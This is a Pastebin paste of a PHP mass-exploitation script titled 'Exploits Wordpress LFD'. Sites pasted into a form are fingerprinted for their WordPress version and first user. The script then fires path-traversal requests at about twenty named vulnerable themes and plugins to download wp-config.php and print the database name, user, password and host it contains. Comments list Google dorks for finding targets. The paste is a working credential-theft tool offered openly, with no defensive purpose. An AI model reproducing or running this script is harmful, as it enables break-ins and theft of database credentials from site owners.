Advertisement
D3vice

Exploits Wordpress LFD 2016

Feb 5th, 2016
1,011
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.73 KB | None | 0 0
  1. <html>
  2. <body>
  3. <pre><center>                  
  4.         <h2>Exploits Wordpress LFD </h2>
  5.             <p>Coded by D3vice </p>
  6.     <form method='POST'>
  7.     <textarea name='sites' cols='45' rows='15'></textarea>
  8.     _______________________________________________________________
  9.     <input type='submit' value='Exploit' /><br>
  10.     </form>
  11.  
  12.  
  13. <?php
  14.  
  15. # Coded by : D3vice
  16. # Exploits Wordpress LFD
  17.  
  18. /**
  19.  Dork Google: revslider.php "index of"
  20.  "wp-content/themes/construct/"
  21.  "wp-content/themes/persuasion"
  22.  "wp-content/themes/manbiz2"
  23.  "wp-content/themes/elegance"
  24.  "wp-content/themes/modular/"
  25.  "wp-content/themes/myriad/"
  26.  "wp-content/themes/echelon/"
  27.  "wp-content/themes/fusion/"
  28.  "wp-content/themes/awake/"
  29. **/
  30.  
  31.  
  32.  
  33. @set_time_limit(0);
  34.  
  35.  
  36. $sites = explode("\r\n", $_POST['sites']);
  37.  
  38. foreach($sites as $site) {
  39.  
  40. $site = trim($site);
  41.  
  42. $ch = curl_init();
  43. curl_setopt($ch, CURLOPT_URL, "$site");
  44. curl_setopt($ch, CURLOPT_HEADER, 1);
  45. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  46. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  47. $get = curl_exec($ch);
  48. curl_close($ch);
  49.     if(preg_match("#WordPress (.*?)/>#", $get, $version)){
  50.     $str = str_replace('/>', "", $version[0]);
  51.     $str = str_replace('"', "", $str);
  52.    
  53.     $users = @file_get_contents("$site/?author=1");
  54.     preg_match('/<title>(.*?)<\/title>/si',$users,$user);
  55.     $wpuser = explode('|',$user[1]);
  56. echo " <br>_______________________________________________________________</br>";
  57. echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
  58.    
  59.     # Dork Google: revslider.php "index of"
  60.    # inurl:wp-content/themes/antioch
  61.    # inurl:wp-content/themes/authentic
  62.    
  63.  
  64. $expl = array("wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php","wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php","wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php","wp-content/themes/urbancity/lib/scripts/download.php?file=wp-config.php","wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php","wp-content/themes/acento/includes/view-pdf.php?download=1&file=../../../../wp-config.php","wp-content/force-download.php?file=../wp-config.php","wp-content/themes/lote27/download.php?download=../../../wp-config.php","wp-content/plugins/wp-custom-pages/wp-download.php?download=../../../wp-config.php");
  65. foreach($expl as $exploit){
  66. $ch = curl_init();
  67. curl_setopt($ch, CURLOPT_URL, "$site/$exploit");
  68. curl_setopt($ch, CURLOPT_HTTPGET, 1);
  69. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
  70. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
  71. $xp = curl_exec ($ch);
  72. curl_close($ch);
  73. if(preg_match("#DB_USER#i",$xp)){
  74. preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
  75. echo "DB_NAME:{$DB_NAME[1]}<br>";
  76. preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
  77. echo "DB_USER:{$DB_USER[1]}<br>";
  78. preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
  79. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  80. preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
  81. echo "DB_HOST:{$DB_HOST[1]}<br>";
  82.  
  83. }}
  84.  
  85. $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php","wp-content/themes/dejavu/lib/scripts/dl-skin.php");
  86. foreach($lt as $l){
  87. $site = "$site/$l";
  88. $process = curl_init($site);
  89. curl_setopt($process, CURLOPT_TIMEOUT, 30);
  90. curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
  91. curl_setopt($process, CURLOPT_HEADER, TRUE);
  92. curl_setopt($process, CURLOPT_POST, 1);
  93. curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
  94. curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
  95. curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
  96. $return = curl_exec($process);
  97. if(preg_match("#DB_USER#i",$return)){
  98. preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
  99. echo "DB_NAME:{$DB_NAME[1]}<br>";
  100. preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
  101. echo "DB_USER:{$DB_USER[1]}<br>";
  102. preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
  103. echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
  104. preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
  105. echo "DB_HOST:{$DB_HOST[1]}<br>";
  106. break;
  107. echo " <br>_______________________________________________________________</br>";
  108.  
  109. }
  110. }
  111. }
  112.  
  113. ?>
  114. </html>
  115. </body>
  116. </pre></center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement